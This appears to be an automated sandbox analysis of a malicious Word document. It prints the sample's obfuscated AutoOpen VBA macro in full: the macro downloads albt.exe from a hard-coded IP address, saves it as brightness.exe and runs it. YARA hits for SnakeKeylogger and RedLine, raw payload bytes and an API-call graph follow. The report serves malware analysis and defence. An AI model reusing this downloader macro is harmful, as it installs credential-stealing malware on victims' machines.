                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000012.00000001.2046118520.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                        Has exited:false

                                                                                                                                                                        Disassembly

                                                                                                                                                                        Code Analysis

                                                                                                                                                                        Call Graph

                                                                                                                                                                        • Entrypoint
                                                                                                                                                                        • Decryption Function
                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        • Show Help
                                                                                                                                                                        callgraph 9 AutoOpen Shell:1,CreateObject:2,Open:1,Send:1

                                                                                                                                                                        Module: ThisDocument

                                                                                                                                                                        Declaration
                                                                                                                                                                        LineContent
                                                                                                                                                                        1

                                                                                                                                                                        Attribute VB_Name = "ThisDocument"

                                                                                                                                                                        2

                                                                                                                                                                        Attribute VB_Base = "1Normal.ThisDocument"

                                                                                                                                                                        3

                                                                                                                                                                        Attribute VB_GlobalNameSpace = False

                                                                                                                                                                        4

                                                                                                                                                                        Attribute VB_Creatable = False

                                                                                                                                                                        5

                                                                                                                                                                        Attribute VB_PredeclaredId = True

                                                                                                                                                                        6

                                                                                                                                                                        Attribute VB_Exposed = True

                                                                                                                                                                        7

                                                                                                                                                                        Attribute VB_TemplateDerived = True

                                                                                                                                                                        8

                                                                                                                                                                        Attribute VB_Customizable = True

                                                                                                                                                                        Executed Functions

                                                                                                                                                                        Subroutine

                                                                                                                                                                        AutoOpenAPIs: 6, Strings: 20, Number of lines: 59, Relevance: 70.059

                                                                                                                                                                        APIsMeta Information

                                                                                                                                                                        CreateObject

                                                                                                                                                                        		CreateObject("MSXML2.ServerXMLHTTP")

                                                                                                                                                                        CreateObject

                                                                                                                                                                        		CreateObject("Adodb.Stream")

                                                                                                                                                                        Open

                                                                                                                                                                        		IServerXMLHTTPRequest2.Open("GET","http://147.124.216.113/albt.exe",False)

                                                                                                                                                                        Send

                                                                                                                                                                        responsebody

                                                                                                                                                                        		IServerXMLHTTPRequest2.responsebody() -> ?P\x02\x00\x04\x0f?\x00\xfffd\x00\x00\x00@\x1a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00????????????????4???????????\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00O ??\x00\x00\x00\x00\xfffd?c??\x06? \x00\x00?\x06?\x00?\x06\x00@?\x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x12?\x00\x00\x00\x02\x00\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x07?\x00 \x08? \x00\x00\x00\x00\x00\x00\x00\x00?\x07?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x07\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x07?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00??t\x00?\x06?\x00?\x06?\x00\x00\x00\x00\x00\x00\x00 ????\x00?\x00?\x06?\x00?\x06\x00\x00\x00\x00\x00\x00 ???a\x00?\x00?\x06 \x00?\x06\x00\x00\x00\x00\x00\x00@???\x00\x00?\x00?\x07\x00\x00?\x06\x00\x00\x00\x00\x00\x00\x00????\x00?\x00?\x07?\x00?\x06\x00\x00\x00\x00\x00\x00@???\x00\x004\x00?\x07\x00\x00?\x07\x00\x00\x00\x00\x00\x00\x00????\x00\x18\x00?\x07?\x00?\x07\x00\x00\x00\x00\x00\x00@????\x00?\x00?\x07?\x00?\x07\x00\x00\x00\x00\x00\x00@???c\x00? \x08? ?\x07\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00?\x12\x00\x00?\x11\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@????U\x00\x00\x01\x00?@??????@?@???\x01\x00?\x00??@?????\x00?????@???\x01\x00?\x00??@???\x03\x00?\xfffd??@?????\x05\x00????@?????@???????@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x04\x00\x00\x00?@?@?@?@?@?@?@?@?????@??????\x00\x00\x00????\x00?@??????\x00\x00\x01\x00\x00\x00?\x00\x00\x00????\x03??@???????A?\x02\x00\x00\xfffd\x00\x00???????????P????P????P???????A\x00\x00\x00\x00\x00?\x00\x00\x00???\x00\x00\x00?@?@?@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x0c\x00?@?@?@?@?@?@?@?@?@????????????G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G????\x00?????I??????????G???G???G???G???W\x00?????????????????`????????\xfffd????????????????t???@?????????@???????????????@?????????????????????@???????????????@???????????????????????????????????????@???????????????????????????????????????????????????@?C????I????????????????@?A???I??????????????????G??????????G????????????\x00???\x03????\x03???G????????????G?????\x00????G?\x00????????G???????????-?????????\x0b???????????\x00?????G??????G?????????h\x10?\x00\x14j?????????????G????\xfffd?????\x02\x00??????????G??????????????G????????????????????G????????????\x10\x01???\x00??h??j???????????????G??G??G?????\x00????????????????h????????????????\x00?????? ???G??\x00???????F????????????????f??????A????C??\x03?????????\x03??\xfffd\x01?????\xfffd\x01?????\xfffd\x01?????j???A\x00??????????????G??A\x00???G?j???A\x00???G????????u??G????\x00\x00?????????G??????????????????G??????\x01???????????????????G????G????\x00??????G??G???????????G???????????G????\x01\x00????????????\x03????\xfffd\x01?????????\xfffd\x01???????????????\x01??\x00?\xfffd??????????????????G?????????????????????????????G???????G??G??????????\x00???????????????????G????????????????????\x00??????????????\x00??????????????????\x00??????????????????????????\x03?????????????????????????\xfffd\x01?????????\xfffd\x01?????????????\xfffd\x01?????????\xfffd\x01??????????????\x00?????????\x00????????????\x13?????????????\x00?????????\x00???????a??\x0b????????G?\x13??????????\x00h?????????????\x13????\x02\x00??G?\x13??G??G???????????????????\x00????????@\x00????????????????????????? ???????????????????????????????????\x02????l??????\x00??????????\x00???\x00?\xfffd\x00?\x0b??\x00?\xfffd????????\x00?\xfffd\x01??????j???\xfffd\x01????????????\x00????????????????jU??\x0b???????????\x00????????G????????????????????????????\x00??????\x00???\x00?\xfffd\x01???????????\xfffd\x01?????????????\x00????????????\x00??????????Q?????\xfffd\x00%????????????????????\x0b?c????????\x00???????\x00??A????????????????????????????????????\x00??????A??????????????????????????????????????????????????????????????????@?x???????????\x04???????????????????????????@??G????????\xfffd???????????????G???@????????????????????????????????|????????????????????????????????????????????????????????????????????????????????\xfffd?????????????\x7f???????????????????????????\x1f???????????????@??????\x0c?s????????????????????????????????????\x00?????\xfffd????????\xfffd\x10?????????????????u?????????R???z?????????@????????\x00\x01????H???????????G????????????????????G?????????\x00??h\x10?\x00\x01j????G??G???@??????????????G???G???????????\x00?????G????^?????????????????????7???????\x00?????????????????????\xfffd?????????\xfffd\x00???\xfffd??\x00???????\x00??????????????\x00???A\x00?\xfffd\x00?????????\x00?????????????????????????????????????????\xfffd???8??\x00??\x02\x00???????\xfffd\x00??\xfffd\x00??????????????????????????\x00?????????????????\x01?\x0b??????\x00?\x0b??????????G?\x00????????????\x00???\x00???????????\x00???????????????\xfffd????????????????????????????????????????\xfffd???????????????????G?????\x00??????\x02???\xfffd??????????(\x00???????\x00???????????????\xfffd???????\xfffd?\x00??????????\x01?>?\xfffd\x00??????@?\x00???????????\xfffd?f?f?????????f?f?f??????????@?\x00???????????? ??K??????\x07\x00???????@?\x00????????????\x00???????????f?f?f???????????????????????\x00???@????????\xfffd???????????????@?\x00??????????????\x00\x00?????????? ????????????????????\x03\x00????-\x00??????j??????\x00????????????????????\x00\x00??????????????????? ???\xfffd\x00\x00???n???\x00?????????????????????????????\xfffd\x00\x00?\x00???????????\x00????????\x00???????????????????????????7\x00???;???@??????????\x01\x00??????\xfffd\x00%????\x0b???\x00?\x04?????\x07\x00???????????????????\x00?\xfffd?????\x00??s??\xfffd??P\x00???????????%??????????????G?G??G?G\xfffd\x04??G???????????????????@??????G????h?????????7\x00?

                                                                                                                                                                        Shell

                                                                                                                                                                        		Shell(""brightness.exe"") -> 7884
                                                                                                                                                                        StringsDecrypted Strings
                                                                                                                                                                        "M""S""X""M""L""2"".""S""er""ver""XM""LH""TTP"
                                                                                                                                                                        "Ad""od""b.S""tr""ea""m"
                                                                                                                                                                        "h"
                                                                                                                                                                        "t"
                                                                                                                                                                        "t""p:/""/147.124.216.113/albt"
                                                                                                                                                                        "."
                                                                                                                                                                        "e"
                                                                                                                                                                        "x"
                                                                                                                                                                        "e"
                                                                                                                                                                        "GET"
                                                                                                                                                                        "brightness"
                                                                                                                                                                        "."
                                                                                                                                                                        "e"
                                                                                                                                                                        "x"
                                                                                                                                                                        "e"
                                                                                                                                                                        """brightness"
                                                                                                                                                                        "."
                                                                                                                                                                        "e"
                                                                                                                                                                        "x"
                                                                                                                                                                        "e"""
                                                                                                                                                                        LineInstructionMeta Information
                                                                                                                                                                        9

                                                                                                                                                                        Sub AutoOpen()

                                                                                                                                                                        11

                                                                                                                                                                        Dim xHttp

                                                                                                                                                                        executed
                                                                                                                                                                        16

                                                                                                                                                                        Set xHttp = CreateObject("M" & "S" & "X" & "M" & "L" & "2" & "." & "S" & "er" & "ver" & "XM" & "LH" & "TTP")

                                                                                                                                                                        CreateObject("MSXML2.ServerXMLHTTP")

                                                                                                                                                                        executed
                                                                                                                                                                        18

                                                                                                                                                                        Dim bStrm

                                                                                                                                                                        20

                                                                                                                                                                        Set bStrm = CreateObject("Ad" & "od" & "b.S" & "tr" & "ea" & "m")

                                                                                                                                                                        CreateObject("Adodb.Stream")

                                                                                                                                                                        executed
                                                                                                                                                                        24

                                                                                                                                                                        Dim nirm1

                                                                                                                                                                        25

                                                                                                                                                                        nirm1 = "h"

                                                                                                                                                                        26

                                                                                                                                                                        Dim nirm2

                                                                                                                                                                        27

                                                                                                                                                                        nirm2 = "t"

                                                                                                                                                                        28

                                                                                                                                                                        Dim nirm3

                                                                                                                                                                        29

                                                                                                                                                                        nirm3 = "t" & "p:/" & "/147.124.216.113/albt"

                                                                                                                                                                        30

                                                                                                                                                                        Dim nirm4

                                                                                                                                                                        31

                                                                                                                                                                        nirm4 = "."

                                                                                                                                                                        32

                                                                                                                                                                        Dim nirm5

                                                                                                                                                                        33

                                                                                                                                                                        nirm5 = "e"

                                                                                                                                                                        34

                                                                                                                                                                        Dim nirm6

                                                                                                                                                                        35

                                                                                                                                                                        nirm6 = "x"

                                                                                                                                                                        36

                                                                                                                                                                        Dim nirm7

                                                                                                                                                                        37

                                                                                                                                                                        nirm7 = "e"

                                                                                                                                                                        41

                                                                                                                                                                        Dim plpl

                                                                                                                                                                        42

                                                                                                                                                                        plpl = nirm1 & nirm2 & nirm3 & nirm4 & nirm5 & nirm6 & nirm7

                                                                                                                                                                        45

                                                                                                                                                                        xHttp.Open "GET", plpl, False

                                                                                                                                                                        IServerXMLHTTPRequest2.Open("GET","http://147.124.216.113/albt.exe",False)

                                                                                                                                                                        executed
                                                                                                                                                                        46

                                                                                                                                                                        xHttp.Send

                                                                                                                                                                        Send

                                                                                                                                                                        52

                                                                                                                                                                        With bStrm

                                                                                                                                                                        53

                                                                                                                                                                        . Type = 1

                                                                                                                                                                        54

                                                                                                                                                                        . Open

                                                                                                                                                                        55

                                                                                                                                                                        . write xHttp.responsebody

                                                                                                                                                                        IServerXMLHTTPRequest2.responsebody() -> ?P\x02\x00\x04\x0f?\x00\xfffd\x00\x00\x00@\x1a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00????????????????4???????????\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00O ??\x00\x00\x00\x00\xfffd?c??\x06? \x00\x00?\x06?\x00?\x06\x00@?\x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x12?\x00\x00\x00\x02\x00\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x07?\x00 \x08? \x00\x00\x00\x00\x00\x00\x00\x00?\x07?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x07\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x07?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00??t\x00?\x06?\x00?\x06?\x00\x00\x00\x00\x00\x00\x00 ????\x00?\x00?\x06?\x00?\x06\x00\x00\x00\x00\x00\x00 ???a\x00?\x00?\x06 \x00?\x06\x00\x00\x00\x00\x00\x00@???\x00\x00?\x00?\x07\x00\x00?\x06\x00\x00\x00\x00\x00\x00\x00????\x00?\x00?\x07?\x00?\x06\x00\x00\x00\x00\x00\x00@???\x00\x004\x00?\x07\x00\x00?\x07\x00\x00\x00\x00\x00\x00\x00????\x00\x18\x00?\x07?\x00?\x07\x00\x00\x00\x00\x00\x00@????\x00?\x00?\x07?\x00?\x07\x00\x00\x00\x00\x00\x00@???c\x00? \x08? ?\x07\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00?\x12\x00\x00?\x11\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@????U\x00\x00\x01\x00?@??????@?@???\x01\x00?\x00??@?????\x00?????@???\x01\x00?\x00??@???\x03\x00?\xfffd??@?????\x05\x00????@?????@???????@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x04\x00\x00\x00?@?@?@?@?@?@?@?@?????@??????\x00\x00\x00????\x00?@??????\x00\x00\x01\x00\x00\x00?\x00\x00\x00????\x03??@???????A?\x02\x00\x00\xfffd\x00\x00???????????P????P????P???????A\x00\x00\x00\x00\x00?\x00\x00\x00???\x00\x00\x00?@?@?@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x0c\x00?@?@?@?@?@?@?@?@?@????????????G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G????\x00?????I??????????G???G???G???G???W\x00?????????????????`????????\xfffd????????????????t???@?????????@???????????????@?????????????????????@???????????????@???????????????????????????????????????@???????????????????????????????????????????????????@?C????I????????????????@?A???I??????????????????G??????????G????????????\x00???\x03????\x03???G????????????G?????\x00????G?\x00????????G???????????-?????????\x0b???????????\x00?????G??????G?????????h\x10?\x00\x14j?????????????G????\xfffd?????\x02\x00??????????G??????????????G????????????????????G????????????\x10\x01???\x00??h??j???????????????G??G??G?????\x00????????????????h????????????????\x00?????? ???G??\x00???????F????????????????f??????A????C??\x03?????????\x03??\xfffd\x01?????\xfffd\x01?????\xfffd\x01?????j???A\x00??????????????G??A\x00???G?j???A\x00???G????????u??G????\x00\x00?????????G??????????????????G??????\x01???????????????????G????G????\x00??????G??G???????????G???????????G????\x01\x00????????????\x03????\xfffd\x01?????????\xfffd\x01???????????????\x01??\x00?\xfffd??????????????????G?????????????????????????????G???????G??G??????????\x00???????????????????G????????????????????\x00??????????????\x00??????????????????\x00??????????????????????????\x03?????????????????????????\xfffd\x01?????????\xfffd\x01?????????????\xfffd\x01?????????\xfffd\x01??????????????\x00?????????\x00????????????\x13?????????????\x00?????????\x00???????a??\x0b????????G?\x13??????????\x00h?????????????\x13????\x02\x00??G?\x13??G??G???????????????????\x00????????@\x00????????????????????????? ???????????????????????????????????\x02????l??????\x00??????????\x00???\x00?\xfffd\x00?\x0b??\x00?\xfffd????????\x00?\xfffd\x01??????j???\xfffd\x01????????????\x00????????????????jU??\x0b???????????\x00????????G????????????????????????????\x00??????\x00???\x00?\xfffd\x01???????????\xfffd\x01?????????????\x00????????????\x00??????????Q?????\xfffd\x00%????????????????????\x0b?c????????\x00???????\x00??A????????????????????????????????????\x00??????A??????????????????????????????????????????????????????????????????@?x???????????\x04???????????????????????????@??G????????\xfffd???????????????G???@????????????????????????????????|????????????????????????????????????????????????????????????????????????????????\xfffd?????????????\x7f???????????????????????????\x1f???????????????@??????\x0c?s????????????????????????????????????\x00?????\xfffd????????\xfffd\x10?????????????????u?????????R???z?????????@????????\x00\x01????H???????????G????????????????????G?????????\x00??h\x10?\x00\x01j????G??G???@??????????????G???G???????????\x00?????G????^?????????????????????7???????\x00?????????????????????\xfffd?????????\xfffd\x00???\xfffd??\x00???????\x00??????????????\x00???A\x00?\xfffd\x00?????????\x00?????????????????????????????????????????\xfffd???8??\x00??\x02\x00???????\xfffd\x00??\xfffd\x00??????????????????????????\x00?????????????????\x01?\x0b??????\x00?\x0b??????????G?\x00????????????\x00???\x00???????????\x00???????????????\xfffd????????????????????????????????????????\xfffd???????????????????G?????\x00??????\x02???\xfffd??????????(\x00???????\x00???????????????\xfffd???????\xfffd?\x00??????????\x01?>?\xfffd\x00??????@?\x00???????????\xfffd?f?f?????????f?f?f??????????@?\x00???????????? ??K??????\x07\x00???????@?\x00????????????\x00???????????f?f?f???????????????????????\x00???@????????\xfffd???????????????@?\x00??????????????\x00\x00?????????? ????????????????????\x03\x00????-\x00??????j??????\x00????????????????????\x00\x00??????????????????? ???\xfffd\x00\x00???n???\x00?????????????????????????????\xfffd\x00\x00?\x00???????????\x00????????\x00???????????????????????????7\x00???;???@??????????\x01\x00??????\xfffd\x00%????\x0b???\x00?\x04?????\x07\x00???????????????????\x00?\xfffd?????\x00??s??\xfffd??P\x00???????????%??????????????G?G??G?G\xfffd\x04??G???????????????????@??????G????h?????????7\x00?

                                                                                                                                                                        executed
                                                                                                                                                                        59

                                                                                                                                                                        Dim monu1

                                                                                                                                                                        60

                                                                                                                                                                        monu1 = "brightness"

                                                                                                                                                                        61

                                                                                                                                                                        Dim monu2

                                                                                                                                                                        62

                                                                                                                                                                        monu2 = "."

                                                                                                                                                                        64

                                                                                                                                                                        Dim monu3

                                                                                                                                                                        65

                                                                                                                                                                        monu3 = "e"

                                                                                                                                                                        67

                                                                                                                                                                        Dim monu4

                                                                                                                                                                        68

                                                                                                                                                                        monu4 = "x"

                                                                                                                                                                        70

                                                                                                                                                                        Dim monu5

                                                                                                                                                                        71

                                                                                                                                                                        monu5 = "e"

                                                                                                                                                                        73

                                                                                                                                                                        Dim monu6

                                                                                                                                                                        74

                                                                                                                                                                        monu6 = monu1 & monu2 & monu3 & monu4 & monu5

                                                                                                                                                                        77

                                                                                                                                                                        . savetofile monu6, 2

                                                                                                                                                                        80

                                                                                                                                                                        Dim parveen1

                                                                                                                                                                        81

                                                                                                                                                                        Dim parveen2

                                                                                                                                                                        82

                                                                                                                                                                        Dim parveen3

                                                                                                                                                                        83

                                                                                                                                                                        Dim parveen4

                                                                                                                                                                        84

                                                                                                                                                                        Dim praveen1

                                                                                                                                                                        85

                                                                                                                                                                        praveen1 = """brightness"

                                                                                                                                                                        86

                                                                                                                                                                        Dim praveen2

                                                                                                                                                                        87

                                                                                                                                                                        praveen2 = "."

                                                                                                                                                                        89

                                                                                                                                                                        Dim praveen3

                                                                                                                                                                        90

                                                                                                                                                                        praveen3 = "e"

                                                                                                                                                                        92

                                                                                                                                                                        Dim praveen4

                                                                                                                                                                        93

                                                                                                                                                                        praveen4 = "x"

                                                                                                                                                                        95

                                                                                                                                                                        Dim praveen5

                                                                                                                                                                        96

                                                                                                                                                                        praveen5 = "e"""

                                                                                                                                                                        101

                                                                                                                                                                        Dim praveen6

                                                                                                                                                                        102

                                                                                                                                                                        praveen6 = praveen1 & praveen2 & praveen3 & praveen4 & praveen5

                                                                                                                                                                        106

                                                                                                                                                                        End With

                                                                                                                                                                        108

                                                                                                                                                                        Shell (praveen6)

                                                                                                                                                                        Shell(""brightness.exe"") -> 7884

                                                                                                                                                                        executed
                                                                                                                                                                        110

                                                                                                                                                                        End Sub

                                                                                                                                                                        Reset < >

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:15.2%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                          Signature Coverage:17.7%
                                                                                                                                                                          Total number of Nodes:300
                                                                                                                                                                          Total number of Limit Nodes:21
                                                                                                                                                                          execution_graph 25510 2904e88 25511 2904e95 25510->25511 25515 2904e9c 25510->25515 25519 2904bdc SysAllocStringLen 25511->25519 25516 2904bfc 25515->25516 25517 2904c02 SysFreeString 25516->25517 25518 2904c08 25516->25518 25517->25518 25519->25515 25520 2904c48 25521 2904c4c 25520->25521 25522 2904c6f 25520->25522 25523 2904c0c 25521->25523 25524 2904c5f SysReAllocStringLen 25521->25524 25525 2904c20 25523->25525 25526 2904c12 SysFreeString 25523->25526 25524->25522 25527 2904bdc 25524->25527 25526->25525 25528 2904bf8 25527->25528 25529 2904be8 SysAllocStringLen 25527->25529 25529->25527 25529->25528 25530 2926bf8 26347 290480c 25530->26347 26348 290481d 26347->26348 26349 2904843 26348->26349 26350 290485a 26348->26350 26356 2904b78 26349->26356 26365 2904570 26350->26365 26353 290488b 26354 2904850 26354->26353 26370 2904500 26354->26370 26357 2904b85 26356->26357 26364 2904bb5 26356->26364 26359 2904bae 26357->26359 26360 2904b91 26357->26360 26361 2904570 11 API calls 26359->26361 26376 2902c44 11 API calls 26360->26376 26361->26364 26362 2904b9f 26362->26354 26377 29044ac 26364->26377 26366 2904574 26365->26366 26367 2904598 26365->26367 26390 2902c10 26366->26390 26367->26354 26369 2904581 26369->26354 26371 2904504 26370->26371 26372 2904514 26370->26372 26371->26372 26374 2904570 11 API calls 26371->26374 26373 2904542 26372->26373 26375 2902c2c 11 API calls 26372->26375 26373->26353 26374->26372 26375->26373 26376->26362 26378 29044b2 26377->26378 26379 29044cd 26377->26379 26378->26379 26381 2902c2c 26378->26381 26379->26362 26382 2902c3a 26381->26382 26384 2902c30 26381->26384 26382->26379 26383 2902d19 26389 2902ce8 7 API calls 26383->26389 26384->26382 26384->26383 26388 29064cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 26384->26388 26387 2902d3a 26387->26379 26388->26383 26389->26387 26391 2902c27 26390->26391 26393 2902c14 26390->26393 26391->26369 26392 2902c1e 26392->26369 26393->26392 26395 2902d19 26393->26395 26398 29064cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 26393->26398 26399 2902ce8 7 API calls 26395->26399 26397 2902d3a 26397->26369 26398->26395 26399->26397 26400 292bf78 26403 291f0a8 26400->26403 26404 291f0b0 26403->26404 26404->26404 29588 2918704 LoadLibraryW 26404->29588 26406 291f0d2 29593 2902ee0 QueryPerformanceCounter 26406->29593 26408 291f0d7 26409 291f0e1 InetIsOffline 26408->26409 26410 291f0eb 26409->26410 26411 291f0fc 26409->26411 26412 2904500 11 API calls 26410->26412 26413 2904500 11 API calls 26411->26413 26414 291f0fa 26412->26414 26413->26414 26415 290480c 11 API calls 26414->26415 26416 291f129 26415->26416 26417 291f131 26416->26417 29596 2904798 26417->29596 26419 291f154 26420 291f15c 26419->26420 26421 291f166 26420->26421 29611 291881c 26421->29611 26424 290480c 11 API calls 26425 291f18d 26424->26425 26426 291f195 26425->26426 26427 2904798 11 API calls 26426->26427 26428 291f1b8 26427->26428 26429 291f1c0 26428->26429 29624 29046a4 26429->29624 29626 29180c0 29588->29626 29590 291873d 29637 2917cf8 29590->29637 29594 2902ef8 GetTickCount 29593->29594 29595 2902eed 29593->29595 29594->26408 29595->26408 29597 290479c 29596->29597 29598 29047fd 29596->29598 29599 2904500 29597->29599 29600 29047a4 29597->29600 29604 2904570 11 API calls 29599->29604 29606 2904514 29599->29606 29600->29598 29601 29047b3 29600->29601 29603 2904500 11 API calls 29600->29603 29605 2904570 11 API calls 29601->29605 29602 2904542 29602->26419 29603->29601 29604->29606 29608 29047cd 29605->29608 29606->29602 29607 2902c2c 11 API calls 29606->29607 29607->29602 29609 2904500 11 API calls 29608->29609 29610 29047f9 29609->29610 29610->26419 29612 2918830 29611->29612 29613 291884f LoadLibraryA 29612->29613 29673 290494c 29613->29673 29616 290494c 29617 2918872 GetProcAddress 29616->29617 29618 2918899 29617->29618 29619 2917cf8 18 API calls 29618->29619 29620 29188dd FreeLibrary 29619->29620 29621 29188f5 29620->29621 29622 29044d0 11 API calls 29621->29622 29623 2918902 29622->29623 29623->26424 29625 29046aa 29624->29625 29627 2904500 11 API calls 29626->29627 29628 29180e5 29627->29628 29651 291790c 29628->29651 29631 2904798 11 API calls 29632 29180ff 29631->29632 29633 2918107 GetModuleHandleW GetProcAddress GetProcAddress 29632->29633 29634 291813a 29633->29634 29657 29044d0 29634->29657 29638 2904500 11 API calls 29637->29638 29639 2917d1d 29638->29639 29640 291790c 12 API calls 29639->29640 29641 2917d2a 29640->29641 29642 2904798 11 API calls 29641->29642 29643 2917d3a 29642->29643 29662 2918018 29643->29662 29646 29180c0 15 API calls 29647 2917d53 NtWriteVirtualMemory 29646->29647 29648 2917d7f 29647->29648 29649 29044d0 11 API calls 29648->29649 29650 2917d8c FreeLibrary 29649->29650 29650->26406 29652 291791d 29651->29652 29653 2904b78 11 API calls 29652->29653 29655 291792d 29653->29655 29654 2917999 29654->29631 29655->29654 29661 290ba3c CharNextA 29655->29661 29659 29044d6 29657->29659 29658 29044fc 29658->29590 29659->29658 29660 2902c2c 11 API calls 29659->29660 29660->29659 29661->29655 29663 2904500 11 API calls 29662->29663 29664 291803b 29663->29664 29665 291790c 12 API calls 29664->29665 29666 2918048 29665->29666 29667 2918050 GetModuleHandleA 29666->29667 29668 29180c0 15 API calls 29667->29668 29669 2918061 GetModuleHandleA 29668->29669 29670 291807f 29669->29670 29671 29044ac 11 API calls 29670->29671 29672 2917d4d 29671->29672 29672->29646 29674 2904950 GetModuleHandleA 29673->29674 29674->29616 29675 2901c6c 29676 2901d04 29675->29676 29677 2901c7c 29675->29677 29680 2901f58 29676->29680 29681 2901d0d 29676->29681 29678 2901cc0 29677->29678 29679 2901c89 29677->29679 29682 2901724 10 API calls 29678->29682 29683 2901c94 29679->29683 29723 2901724 29679->29723 29684 2901fec 29680->29684 29687 2901f68 29680->29687 29688 2901fac 29680->29688 29685 2901d25 29681->29685 29699 2901e24 29681->29699 29707 2901cd7 29682->29707 29690 2901d2c 29685->29690 29691 2901d48 29685->29691 29695 2901dfc 29685->29695 29693 2901724 10 API calls 29687->29693 29692 2901fb2 29688->29692 29696 2901724 10 API calls 29688->29696 29689 2901e7c 29694 2901724 10 API calls 29689->29694 29698 2901e95 29689->29698 29701 2901d79 Sleep 29691->29701 29709 2901d9c 29691->29709 29697 2901f82 29693->29697 29700 2901f2c 29694->29700 29703 2901724 10 API calls 29695->29703 29702 2901fc1 29696->29702 29715 2901a8c 8 API calls 29697->29715 29717 2901fa7 29697->29717 29699->29689 29699->29698 29704 2901e55 Sleep 29699->29704 29700->29698 29716 2901a8c 8 API calls 29700->29716 29705 2901d91 Sleep 29701->29705 29701->29709 29702->29717 29718 2901a8c 8 API calls 29702->29718 29713 2901e05 29703->29713 29704->29689 29708 2901e6f Sleep 29704->29708 29705->29691 29706 2901ca1 29712 2901cb9 29706->29712 29747 2901a8c 29706->29747 29711 2901a8c 8 API calls 29707->29711 29714 2901cfd 29707->29714 29708->29699 29711->29714 29720 2901a8c 8 API calls 29713->29720 29722 2901e1d 29713->29722 29715->29717 29719 2901f50 29716->29719 29721 2901fe4 29718->29721 29720->29722 29724 2901968 29723->29724 29725 290173c 29723->29725 29726 2901a80 29724->29726 29727 2901938 29724->29727 29736 29017cb Sleep 29725->29736 29737 290174e 29725->29737 29729 2901684 VirtualAlloc 29726->29729 29730 2901a89 29726->29730 29731 2901947 Sleep 29727->29731 29740 2901986 29727->29740 29728 290175d 29728->29706 29732 29016bf 29729->29732 29733 29016af 29729->29733 29730->29706 29734 290195d Sleep 29731->29734 29731->29740 29732->29706 29764 2901644 29733->29764 29734->29727 29736->29737 29739 29017e4 Sleep 29736->29739 29737->29728 29738 290182c 29737->29738 29741 290180a Sleep 29737->29741 29746 2901838 29738->29746 29770 29015cc 29738->29770 29739->29725 29742 29015cc VirtualAlloc 29740->29742 29744 29019a4 29740->29744 29741->29738 29743 2901820 Sleep 29741->29743 29742->29744 29743->29737 29744->29706 29746->29706 29748 2901b6c 29747->29748 29751 2901aa1 29747->29751 29749 29016e8 29748->29749 29750 2901aa7 29748->29750 29753 2901c66 29749->29753 29757 2901644 2 API calls 29749->29757 29752 2901ab0 29750->29752 29756 2901b4b 